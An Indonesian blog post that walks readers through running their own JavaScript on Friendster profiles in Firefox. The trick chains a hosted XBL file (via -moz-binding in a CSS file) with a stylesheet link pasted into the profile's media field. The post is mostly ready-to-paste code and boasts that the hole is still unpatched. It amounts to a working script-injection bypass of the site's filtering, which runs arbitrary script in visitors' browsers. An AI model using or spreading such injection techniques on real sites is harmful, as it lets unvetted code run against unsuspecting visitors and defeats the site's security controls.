javascript linker friendster

Bagi yang mau linker js di friendster tapi hanya jalan di firefox, bagi yang ga pake firefox ga usah diteruskan pembahasannya,,, cukup sampe disini aja bacanya..

ok!, kita teruskan bagi pengguna firefox aja..

step 0 copy paste code dibawh ini,, save jadi linker.xml (bebas apa aja!) trus upload di hosting gratisan,,misal ripway.com

——————————–BEGIN————————————–

<?xml version=”1.0″?>
<bindings xmlns=”http://www.mozilla.org/xbl”&gt;
<binding id=”thecradle”>
<implementation>
<constructor>
<![CDATA[document.write(‘<script src=view-source:paste url js kamu disini!></script>’)]]>
</constructor>
</implementation>
</binding>
</bindings>

——————————–END——————————————

step 1 copy paste code dibawah ini,, save jadi linker.css (bebas apa aja!) trus upload juga..

——————————–BEGIN—————————————

body
{
-moz-binding:url(“paste url step 0 disini!#thecradle”);
}

——————————–END——————————————

step 2 simpan script dibawah ini, trus taro di add media

——————————–BEGIN—————————————

<link type=’text/css’ rel=’stylesheet’ href=’paste url step 1 disini!‘ />

——————————–END——————————————

coba refresh profile friendster.. berhasilkah??

aku dah lama pake ini.. tp blum di patch juga.. hehe.. ^_^

bagi yg berhasil,, dan memang saat aku post ini masih bisa.. selamat ber js ria.. haha..

bagi yg suka css linker,, sbnernya pake js linker ini juga udah bisa kok,, tinggal di ulik2 aja bagian js kamu.. ^_^

thx to..

friendstertalk.com for share..

i just modify your script,,^_^

nb : mungkin ada masalah pada double quote ato single quote di source codenya

aku kasih versi txtnya bisa dilihat disini

Iklan